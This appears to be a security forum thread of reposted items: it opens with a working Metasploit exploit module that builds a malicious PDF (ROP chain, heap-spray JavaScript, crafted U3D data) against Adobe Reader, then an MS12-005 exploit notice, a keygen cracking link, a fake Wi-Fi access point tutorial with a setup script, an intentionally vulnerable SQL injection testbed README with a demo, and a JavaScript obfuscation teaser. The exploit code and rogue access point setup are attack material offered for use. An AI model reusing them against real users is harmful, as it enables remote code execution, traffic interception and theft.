      0x4a801f90, # pop eax / ret
      0x4a849170, # becomes eax (import for MSVCR80!memcpy)
      0x4a80b692, # jmp dword ptr [eax] {MSVCR80!memcpy}
      0xffffffff, # ret for memcpy # mapped at 0c0c0db8 => Result of MapViewOfFile
      0xffffffff, # dst (memcpy param) # mapped at 0c0c0dbc => Result of MapViewOfFile
      0xffffffff, # src (memcpy param) # mapped at 0c0c0dc0 => Address of shellcode after ROP chain
      0x00001000  # length (memcpy param)
    ].flatten.pack('V*')

    payload_buf = ''
    payload_buf << stack_data
    payload_buf << payload.encoded
    escaped_payload = Rex::Text.to_unescape(payload_buf)

    eip_ptr = [
      junk(3),
      target.ret, # EIP
      junk(7),
      0x0c0c0c0c, # [eax+3Ch] => becomes ecx / [0x0c0c0c0c] = 0x0c0c0c0c / [0x0c0c0c0c+1Ch] = 4a806cef => stackpivot
      junk(16),
    ].flatten.pack('V*')
    escaped_eip = Rex::Text.to_unescape(eip_ptr)

    js = <<-JS
    var padding;
    var bbb, ccc, ddd, eee, fff, ggg, hhh;
    var pointers_a, i;
    var x = new Array();
    var y = new Array();

    function alloc(bytes) {
      return padding.substr(0, (bytes - 6) / 2);
    }

    function spray_eip(esc_a) {
      pointers_a = unescape(esc_a);
      for (i = 0; i < 2000; i++) {
        x[i] = alloc(0x8) + pointers_a;
        y[i] = alloc(0x88) + pointers_a;
        y[i] = alloc(0x88) + pointers_a;
        y[i] = alloc(0x88) + pointers_a;
      }
    };

    function spray_shellcode() {
      bbb = unescape('#{escaped_payload}');
      ccc = unescape("%u0c0c");
      ccc += ccc;
      while (ccc.length + 20 + 8 < (0x8000 + 0x8000)) ccc += ccc;
      i1 = 0x0c0c - 0x24;
      ddd = ccc.substring(0, i1 / 2);
      ddd += bbb;
      ddd += ccc;
      i2 = 0x4000 + 0xc000;
      eee = ddd.substring(0, i2 / 2);
      for (; eee.length < 0x40000 + 0x40000;) eee += eee;
      i3 = (0x1020 - 0x08) / 2;
      fff = eee.substring(0, 0x80000 - i3);
      ggg = new Array();
      for (hhh = 0; hhh < 0x1e0 + 0x10; hhh++) ggg[hhh] = fff + "s";
    }

    padding = unescape("#{escaped_eip}");
    while (padding.length < 0x10000) padding = padding + padding;

    spray_shellcode();
    spray_eip('%u4141');

    this.pageNum = 2;
    JS

    js = js.gsub(/^\t\t/,'')

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    u3d = make_u3d_stream
    xml = make_xml_data
    pdf = make_pdf(u3d, xml, js.to_s)

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(pdf)
  end

  def make_xml_data
    xml = %Q|<?xml version="1.0" encoding="UTF-8"?>
    <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <ed>kapa</ed>
    <config xmclns="http://www.microsoft.org/schema/xci/2.6/">
    <present>
    <pdf>
    <version>1</version>
    <fjdklsajfodpsajfopjdsio>f</fjdklsajfodpsajfopjdsio>
    <interactive>1</interactive>
    </pdf>
    </present>
    </config>
    <template xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
    <subform name="form1" layout="tb" locale="en_US">
    <pageSet>
    </pageSet>
    </subform>
    </template>
    <template1 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
    <subform name="form1" layout="tb" locale="en_US">
    <pageSet>
    </pageSet>
    </subform>
    </template1>
    <template2 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
    <subform name="form1" layout="tb" locale="en_US">
    <pageSet>
    </pageSet>
    </subform>
    </template2>
    </xdp:xdp>|
    xml = xml.gsub(/^\t\t/, '')
    return xml
  end

  def u3d_pad(str, char="\x00")
    len = str.length % 4
    if (len > 0)
      #puts "Adding %d pad bytes" % (4 - len)
      return (char * (4 - len))
    end
    ""
  end

  def u3d_string(str)
    ([str.length].pack('v') + str)
  end

  def make_u3d_stream()
    #
    # REFERENCE:
    # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%201st%20edition.pdf
    # The File format consists of these blocks:
    # [File Header Block][Declaration Block][Continuation Block]
    # Each block consists of (padding is used to keep fields 32-bit aligned):
    # [Block Type][Data Size][Metadata Size][Data][Data Padding][Meta Data][Meta Data Padding]
    #
    mc_name = u3d_string("CCCCBox01")
    mr_name = u3d_string("Box01RX")

    # build the U3D header (length will be patched in later)
    hdr_data = [0,0].pack('n*') # version info
    hdr_data << [0,0x24,0xa34,0,0x6a].pack('VVVVV') # 31337 was 0xa34
    hdr = "U3D\x00"
    hdr << [hdr_data.length,0].pack('VV')
    hdr << hdr_data

    parent_node_data = "\x01\x00\x00\x00"+ # node count (1)
      "\x00\x00"+ # name (empty)
      # transform matrix
      [0x813f,0,0,0,0,0x813f,0,0,0,0,0x813f,0,0x548a55c0,0xa2027cc2,0,0x813f].pack('N*')

    model_node_data = ""
    model_node_data << mc_name
    model_node_data << parent_node_data
    model_node_data << mr_name
    model_node_data << [1].pack('V') # Model Visibility (Front visible)
    model_node = [0xffffff22,model_node_data.length,0].pack('VVV')
    #model_node = [0xffffff22,0x5e,0].pack('VVV')
    model_node << model_node_data

    bone_weight_data = ""
    bone_weight_data << mc_name
    bone_weight_data << [
      1, # Chain index
      1, # Bone Weight Attributes (for a mesh)
      0x3162123b, # Inverse Quant
      0x14, # Position Count
    ].pack('VVNV')
    # Position List
    bone_weight_data << [
      # 1
      1, # Bone Weight Count
      3, # Bone Index (no Quantized Weight)
      # 2
      0x55550000, # Bone Weight Count
      0x4c1df36e, # Bone Index
      0x0200d002, # Quantized Weight
      # 3
      0x95000074, # Bone Weight Count
      0x66ccc357, # Bone Index
      0x00000000 # Quantized Weight
    ].pack('VVNNNNNN')
    bone_weight = [0xffffff44,0x3a,0].pack('VVV') # We hardcode the length to match the old file.. (TODO: test if necessary)
    #bone_weight = [0xffffff44,bone_weight_data.length,0].pack('VVV')
    bone_weight << bone_weight_data

    new_objtype1_data = "\x05\x00\x52\x52\x52\x52\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2\xdf\x2a"+
      "\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x05\x00\x52\x52\x52\x52\x52\x01\x00"+
      "\x00\x00\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00"
    #new_objtype1 = [0xffffff16,0x38,0].pack('VVV')
    new_objtype1 = [0xffffff16,new_objtype1_data.length,0].pack('VVV')
    new_objtype1 << new_objtype1_data

    shading_modifier_data = ""
    shading_modifier_data << mc_name
    shading_modifier_data << "\x02\x00\x00\x00\x00\x00\x00\x00\x01"+
      "\x00\x00\x00\x00\x00\x00\x00\x06\x00\x42\x6f\x02\x00\x00\x00"
    #shading_modifier = [0xffffff45,0x23,0].pack('VVV')
    shading_modifier = [0xffffff45,shading_modifier_data.length,0].pack('VVV')
    shading_modifier << shading_modifier_data

    new_objtype2_data = "\x01\x00\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2"+
      "\xdf\x2a\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x52\x01\x00\x00\x00"+
      "\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00"
    #new_objtype2 = [0xffffff16,0x30,0].pack('VVV')
    new_objtype2 = [0xffffff16,new_objtype2_data.length,0].pack('VVV')
    new_objtype2 << new_objtype2_data

    nodemod_decl = ""
    nodemod_decl << model_node
    nodemod_decl << u3d_pad(nodemod_decl)
    nodemod_decl << bone_weight
    nodemod_decl << u3d_pad(nodemod_decl)
    nodemod_decl << new_objtype1
    nodemod_decl << u3d_pad(nodemod_decl)
    nodemod_decl << shading_modifier
    nodemod_decl << u3d_pad(nodemod_decl)
    nodemod_decl << new_objtype2
    nodemod_decl << u3d_pad(nodemod_decl)
    nodemod_decl <<
      # another modifier chain?
      "\x14\xff\xff\xff\xc0\x01\x00\x00\x00\x00\x00\x00"+
      "\x07\x00\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00"+
      "\x00\x00"+
      # clod mesh generator (declaration)
      "\x31\xff\xff\xff\x9b\x01\x00\x00\x00\x00\x00\x00\x07\x00\x42\x6f\x78\x30\x31\x52"+
      "\x58\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x14\x00\x00\x00\x6c\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x2c\x01\x00\x00\x2c\x01\x00\x00\x2c"+
      "\x01\x00\x00\x87\x52\x0a\x3d\xa6\x05\x6f\x3b\xa6\x05\x6f\x3b\x4a\xf5\x2d\x3c\x4a\xf5\x2d"+
      "\x3c\x66\x66\x66\x3f\x00\x00\x00\x3f\xf6\x28\x7c\x3f\x04\x00\x00\x00\x07\x00\x53\x63\x61"+
      "\x70\x75\x6c\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x07\x00\x48\x75\x6d\x65\x72\x75\x73\x07\x00\x53\x63\x61\x70\x75\x6c\x61\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x55\x6c\x6e\x61\x07\x00\x48\x75"+
      "\x6d\x65\x72\x75\x73\x00\x00\x00\x00\x00\x00\x20\x41\x00\x00\x00\x00\x00\x00\x20\x41\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"+
      "\x00\x52\x61\x64\x69\x75\x73\x04\x00\x55\x6c\x6e\x61\x00\x00\x00\x00\x00\x00\x70\x41\x00"+
      "\x00\x00\x00\x00\x00\x70\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00"+
      # clod mesh generator (progressive mesh cont)
      "\x3c\xff\xff\xff\x6f\x01\x00\x00\x00\x00\x00\x00\x07\x00"+
      "\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x00\x00\x00\x50\x02\x00\x00\x28\x01"+
      "\x00\x00\x7f\x75\x2f\x2b\x00\x00\x20\x73\x00\x00\xc3\x05\x00\x00\x00\x00\x00\x00\x80\x02"+
      "\x45\xe4\x4c\x55\x01\x00\x00\xe0\x30\x03\x00\x00\xb0\x01\x00\x00\x00\x36\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x55\x55\x05\x00\x80\xa3\x2a\x00\xc0\xe1"+
      "\x41\x6b\x92\xf2\xa4\x00\x00\x72\x87\x18\x4c\xd0\xda\x00\x00\x20\x46\xa9\x03\x00\x40\x8c"+
      "\x00\x00\xa0\x7c\xa9\xa7\x10\x03\x00\x00\xc4\x09\x00\x00\x0d\xd2\x50\x85\x03\x72\x00\x80"+
      "\x5c\x37\x19\xc1\xb9\x0f\x00\x20\x55\xf7\x13\x00\x40\x00\xdc\x1f\xf9\x2c\x35\x30\x6e\x06"+
      "\x62\xb6\xea\x09\x2e\x7b\x28\xa4\x90\xe0\xb3\x63\x2c\x20\x92\x2a\x88\xbc\x06\x3a\xff\x80"+
      "\x43\xb2\x00\x00\x00\x14\x62\x0e\x63\xb4\x04\x08\x47\x52\x20\x31\xca\x00\x00\xb4\x21\xe0"+
      "\xd7\x01\x00\xa0\x1a\x72\x11\x71\xc2\x2c\x74\xc1\xa3\x56\xfa\x30\x03\x00\xe0\x7b\xd0\x62"+
      "\x2a\x00\x40\x71\xfa\x6c\xc6\xcf\x07\x78\x81\xd0\x47\x3d\x58\x0e\x51\x0f\x2e\x27\x2d\xbe"+
      "\x26\x10\x06\x6f\x3a\x40\xae\x36\x6a\x43\x60\xdf\xcb\xef\x8c\x38\xca\x04\x92\x79\x4b\x79"+
      "\xe9\x42\xbd\x2b\xb9\x5b\x86\x60\x65\xa4\x75\x01\x19\xda\xcf\x6a\xf7\x2a\x77\x3c\xde\xf1"+
      "\x11\x75\x33\xd3\x94\x74\x4a\x14\x73\x4b\x18\xa1\x66\xc2\x0f\xde\x3d\xed\x19\xd4\x32\x2e"+
      "\xb6\x11\xf2\xc6\x2f\x13\x62\xb9\xe5\xe1\x03\x8b\xb5\x1c\x23\x9f\x80\x03\x75\xb6\x26\xd3"+
      "\x1c\x16\x5f\x9b\x3c\xea\x62\x10\xe1\xb1\x00\x00\x00\x00"

    # build the modifier chain
    chain_data = ""
    chain_data << mc_name
    chain_data << [0].pack('V') # type (node modifier)
    chain_data << [0].pack('V') # attributes (no bounding info)
    chain_data << u3d_pad(chain_data)
    chain_data << [0x5].pack('V') # number of modifiers
    chain_data << nodemod_decl
    #modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV')
    # chain_data was 0x17c bytes
    modifier_chain = [0xffffff14,0x17c,0].pack('VVV')
    modifier_chain << chain_data

    data = ""
    data << hdr
    data << modifier_chain
    data
  end

  def RandomNonASCIIString(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  def ioDef(id)
    "%d 0 obj\n" % id
  end

  def ioRef(id)
    "%d 0 R" % id
  end

  def ASCIIHexWhitespaceEncode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end

  def make_pdf(u3d_stream, xml, js_doc)
    xref = []
    eol = "\x0a"
    obj_end = "" << eol << "endobj" << eol

    # the header
    pdf = "%PDF-1.7" << eol
    # filename/comment
    pdf << "%" << RandomNonASCIIString(4) << eol

    email = rand_text_alpha(3) + "@" + rand_text_alpha(4) + ".com"
    site = rand_text_alpha(5) + ".com"

    xref << pdf.length
    pdf << ioDef(1)
    pdf << "<</Author (Fo)/email (#{email})/web (site)>>"
    pdf << obj_end

    compressed_xml = Zlib::Deflate.deflate(xml)
    xref << pdf.length
    pdf << ioDef(2)
    pdf << "<</Length " << compressed_xml.length.to_s << " /Filter /FlateDecode>>" << eol
    pdf << "stream" << eol
    pdf << compressed_xml << eol
    pdf << "endstream"
    pdf << obj_end

    xref << pdf.length
    pdf << ioDef(3)
    pdf << "<</XFA " << ioRef(2) << ">>"
    pdf << obj_end

    xref << pdf.length
    pdf << ioDef(4)
    pdf << "<</Type/Catalog/Outlines " << ioRef(5)
    pdf << " /Pages " << ioRef(6)
    pdf << " /OpenAction " << ioRef(14)
    pdf << " /AcroForm " << ioRef(3)
    pdf << ">>"
    pdf << obj_end

    xref << pdf.length
    pdf << ioDef(5) << "<</Type/Outlines/Count 0>>"
    pdf << obj_end

    xref << pdf.length
    pdf << ioDef(6)
    pdf << "<</Type/Pages/Count 3/Kids [%s %s %s]>>" % [ioRef(13), ioRef(9), ioRef(12)]
    pdf << obj_end

    data = "\x78\xda\xd3\x70\x4c\x04\x02\x4d\x85\x90\x2c\x00\x0f\xd3\x02\xf5"
    compressed_data = Zlib::Deflate.deflate(data)
    xref << pdf.length
    pdf << ioDef(7)
    pdf << "<</Length %s /Filter /FlateDecode>>" %compressed_data.length.to_s << eol
    pdf << "stream" << eol
    pdf <<
```
compressed_data << eol pdf << "endstream" pdf << obj_end xref << pdf.length pdf << ioDef(8) pdf << "<</ProcSet [/PDF]>>" pdf << obj_end xref << pdf.length pdf << ioDef(9) pdf << "<</Type/Page/Parent %s/MediaBox [0 0 640 480]/Contents %s/Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)] pdf << obj_end compressed_u3d = Zlib::Deflate::deflate(u3d_stream) xref << pdf.length pdf << ioDef(10) pdf << "<</Type/3D/Subtype/U3D/Length %s /Filter/FlateDecode>>" %compressed_u3d.length.to_s << eol pdf << "stream" << eol pdf << compressed_u3d << eol pdf << "endstream" pdf << obj_end xref << pdf.length pdf << ioDef(11) pdf << "<</Type/Annot/Subtype/3D/Contents (#{rand_text_alpha(4)})/3DI false/3DA <</A/PO/DIS/I>>" pdf << "/Rect [0 0 640 480]/3DD %s /F 7>>" %ioRef(10) pdf << obj_end xref << pdf.length pdf << ioDef(12) pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s /Annots [%s]>>" % [ioRef(6), ioRef(7), ioRef(8), ioRef(11)] pdf << obj_end xref << pdf.length pdf << ioDef(13) pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)] pdf << obj_end xref << pdf.length pdf << ioDef(14) pdf << "<</S/JavaScript/JS %s>>" %ioRef(15) pdf << obj_end compressed_js = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc)) xref << pdf.length pdf << ioDef(15) pdf << "<</Length " << compressed_js.length.to_s << " /Filter [/FlateDecode/ASCIIHexDecode]>>" pdf << "stream" << eol pdf << compressed_js << eol pdf << "endstream" pdf << obj_end # xrefs xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end # trailer pdf << "trailer" << eol pdf << "<</Size %d/Root " % (xref.length + 1) << ioRef(4) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol end end Sursa: Adobe Reader U3D Memory Corruption Vulnerability
-
[h=1]Microsoft Windows Assembly Execution Vulnerability MS12-005[/h]

# Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability
# Date: 1/14/2012
# Author: Byoungyoung Lee, http://exploitshop.wordpress.com
# Version: Windows 7 32bit, fully patched until Jan 2012
# Tested on: Windows 7 32bit
# CVE : CVE-2012-0013

PoC: http://www.exploit-db.com/sploits/18372.docm

Open the document file, then allow the macro execution. This will execute a python script (a python interpreter is required).

DEMO : http://www.youtube.com/watch?v=Odi6HiqzmL8&feature=youtu.be&hd=1

Sursa: Microsoft Windows Assembly Execution Vulnerability MS12-005
-
[h=3]keygen tutorial and challenge[/h]
[h=2]Saturday, January 14, 2012[/h]

Keygen'ing as a style of cracking requires you to really know and understand how the protection works. It also requires no modification of the original application, so it is a very pure way of cracking. zAWS!, who posted a keygen for lesson 0's crackme0b, sent me this challenge to share: KeygenMe#1.rar

But before you start, you may want to see his/her keygen tutorial. It comes with the original apk and has videos showing the process: Android Keygening Tutorial-zAWS!.rar

Posted by lohan+

Sursa: android cracking: keygen tutorial and challenge
-
[h=4]Nexpose Vulnerability Scanner Using Metasploit.[/h]

Description: This video shows the usage of the Nexpose vulnerability scanner using Metasploit.

Sursa: Nexpose Vulnerability Scanner Using Metasploit.
-
Setup a Fake Access Point With BackTrack5

Posted Nov 6 2011 by NightRanger

Recently I needed to set up a fake access point for a presentation. I fired up my BackTrack5 VM, connected my Alfa AWUS036H USB adapter and started to configure the fake AP. There are a lot of tutorials and scripts for setting up a fake AP; the “Gerix” tool also has an option to auto-set a fake AP (for some reason this tool never worked for me). I started to set up my fake AP and ran into some trouble for a strange reason. I decided to put my experience here; hopefully you’ll find it useful.

Started by putting my wlan interface in monitor mode:

root@Blackbox:~/fakeap# airmon-ng start wlan1

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1558    dhclient

Interface       Chipset                 Driver

wlan1           Realtek RTL8187L        rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132
                                        (monitor mode enabled on mon0)

I noticed the following error: “Unknown error 132”. Tried using airodump-ng to see what happens…

root@Blackbox:~/fakeap# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Unknown error 132

Got the same error. The solution was simply to unload the RTL8187 driver and load the R8187 driver instead, as follows:

root@Blackbox:~/fakeap# rmmod rtl8187
root@Blackbox:~/fakeap# modprobe r8187

Tried putting wlan in monitor mode again:

root@Blackbox:~/fakeap# airmon-ng start wlan1

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1558    dhclient

Interface       Chipset         Driver

wlan1           RTL8187         r8187 (monitor mode enabled)

Well, that fixed the problem.

root@Blackbox:~/fakeap# iwconfig
lo        no wireless extensions.

eth3      no wireless extensions.

wlan1     802.11b/g  Mode:Monitor  Channel=10  Bit Rate=11 Mb/s  Tx-Power=5 dBm
          Retry:on   Fragment thr:off
          Link Quality=0/100  Signal level=50 dBm  Noise level=-156 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Now we can proceed to the fake AP setup process.

1. Install a DHCP server

apt-get install dhcp3-server

2. Edit “/etc/dhcp3/dhcpd.conf” as follows (you can change the IP address, pool and DNS server as needed):

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 10.0.0.255;
  option routers 10.0.0.254;
  option domain-name-servers 8.8.8.8;
  range 10.0.0.1 10.0.0.140;
}

3. Put your wlan in monitor mode

airmon-ng start wlan1

4. Start airbase-ng; you will need to specify the AP SSID and channel number

airbase-ng -e FreeWifi -c 11 -v wlan1 &

5. Airbase will create a new adapter, “at0”; you will need to enable it and assign it an IP address and subnet mask. The IP address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file.

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0

6. Add a route

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

7. Set up iptables

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

• eth3 is my external interface, which is connected to the internet; change it to whatever yours is

iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE

8. Clear DHCP leases

echo > '/var/lib/dhcp3/dhcpd.leases'

9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting the DHCP server)

ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid

10. Start the DHCP server

dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

11. Don’t forget to enable IP forwarding

echo "1" > /proc/sys/net/ipv4/ip_forward

That’s All Folks!

I have created a simple bash script to automate this process; you will just need to change it to suit your configuration.

#!/bin/bash
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;
echo "Putting Wlan In Monitor Mode..."
airmon-ng stop wlan1 # Change to your wlan interface
sleep 5;
airmon-ng start wlan1 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface
sleep 5;
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
sleep 5;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface
echo > '/var/lib/dhcp3/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
sleep 5;
echo

Sursa: http://exploit.co.il/hacking/set-fake-access-point-backtrack5/
-
[h=1]SpiderLabs / SQLol[/h]

SQLol
Released at Austin Hackers Association meeting 0x3f
Daniel Crowley <dcrowley@trustwave.com>
http://www.trustwave.com

INTRODUCTION
============

***WARNING: SQLol IS INTENTIONALLY VULNERABLE. DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT EXPOSE SQLol IN AN UNTRUSTED ENVIRONMENT.***

SQLol is a configurable SQL injection testbed. SQLol allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw.

To better understand why SQLol exists, please read the sonnet below:

I humbly posit that the current state
(With much respect to work which does precede)
Of test-beds made with vulns to demonstrate
Is lacking some in flexibility.
Two options are presented present-day,
As far as when one deals with S-Q-L:
A blind injection (bool or time delay)
And UNION statement hax (oh gee, how swell…)
Imagine we could choose how queries read
And how our input sanitizes, oh!
How nimble and specific we could be
To recreate our ‘sploit scenarios.
And thus is S-Q-L-O-L conceived:
That we can study how to pwn DBs.

Options:
- Type of query
- Location within query
- Type and level of sanitization
- Level of query output
- Verbosity of error messages
- Visibility of query
- Injection string entry point

Other cool things:
- Reset button
- Challenges
- Support for multiple database systems

REQUIREMENTS
============

PHP 5.x
Web server
Database server (MySQL, PostgreSQL and SQLite have been tested, others may work)
ADODB library (included)

USAGE
=====

Place the SQLol source files on your Web server and open them in a Web browser. Modify the configuration file #sqlol_directory#/includes/database.config.php to point to your installed database server. Use the resetbutton.php script to write the SQLol database, then start playing!

COPYRIGHT
=========

SQLol - A configurable SQL injection testbed
Daniel "unicornFurnace" Crowley
Copyright (C) 2012 Trustwave Holdings, Inc.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>

A configurable SQL injection test-bed. https://www.trustwave.com/spiderLabs.php

Sursa: https://github.com/SpiderLabs/SQLol
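Two of the knobs the README lists, "Location within query" and "Type and level of sanitization", are easiest to understand side by side. The script below is an added example written for this page, not part of SQLol (which is PHP): it builds a constructed users table in an in-memory SQLite database (one of the back ends the README says was tested) and runs the same lookup with string concatenation, with quote-escaping in a numeric context, and with bound parameters, so the reader can see which inputs change the query and which are treated as plain data.

```python
import sqlite3


def make_db():
    """Constructed sample data for the demo, not SQLol's own schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users (username) VALUES (?)",
                     [("alice",), ("bob",), ("carol",)])
    conn.commit()
    return conn


def by_name_concat(conn, username):
    """Injection point inside a quoted string, no sanitization at all."""
    sql = "SELECT username FROM users WHERE username = '%s'" % username
    return sorted(row[0] for row in conn.execute(sql))


def escape_quotes(value):
    """A partial 'sanitization' of the kind SQLol can be configured to apply."""
    return value.replace("'", "''")


def by_id_escaped(conn, user_id):
    """Quotes are escaped, but the value sits in a numeric context, so the
    escaping is irrelevant: no quote is needed to alter the WHERE clause."""
    sql = "SELECT username FROM users WHERE id = %s" % escape_quotes(user_id)
    return sorted(row[0] for row in conn.execute(sql))


def by_name_param(conn, username):
    """Bound parameter: the input reaches the engine as data, never as SQL."""
    rows = conn.execute("SELECT username FROM users WHERE username = ?", (username,))
    return sorted(row[0] for row in rows)


def by_id_param(conn, user_id):
    """Bound parameter in the numeric position; a non-numeric string simply
    fails to compare equal to any integer id."""
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,))
    return sorted(row[0] for row in rows)


def demo():
    """Run each lookup with a benign and a hostile input; return all results."""
    conn = make_db()
    results = {
        "concat_benign": by_name_concat(conn, "bob"),
        "concat_hostile": by_name_concat(conn, "x' OR '1'='1"),
        "escaped_benign": by_id_escaped(conn, "2"),
        "escaped_hostile": by_id_escaped(conn, "2 OR 1=1"),
        "param_name_hostile": by_name_param(conn, "x' OR '1'='1"),
        "param_id_hostile": by_id_param(conn, "2 OR 1=1"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-20s %s" % (name, rows))
```

The two `*_hostile` concatenation cases return every row, and the escaped numeric case shows that escaping quotes is the wrong fix for the wrong location; only the parameterized lookups return nothing for the hostile inputs, which is the behaviour a fix should produce regardless of where in the query the value lands.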
-
[h=2]Obfuscated JavaScript 2.0 - Building an encoder[/h]

JavaScript is a wonderful language full of tricks, power and the element of confusion. In this day and age it is likely that most people handling PDF, JAVA, Flash or browser-based exploits have either seen, reversed or been owned due to JavaScript. To this day attackers continue to find clever new ways of hiding their exploit or making the reversing process a nightmare, but not many have turned to the web 2.0 features. M86 wrote up an entry last week detailing some malware that used AJAX to fetch a portion of its shellcode. Oddly enough, over the winter break, I decided it would be fun to write my own JavaScript encoder with the intention of making it a royal pain to reverse. My encoder also used AJAX, but in a nastier way, so I felt now was the time to do a write-up on it. That and I am in Miami this week attending Infiltrate where there is nothing but offensive events happening all around me, so this is my attempt to fit in.

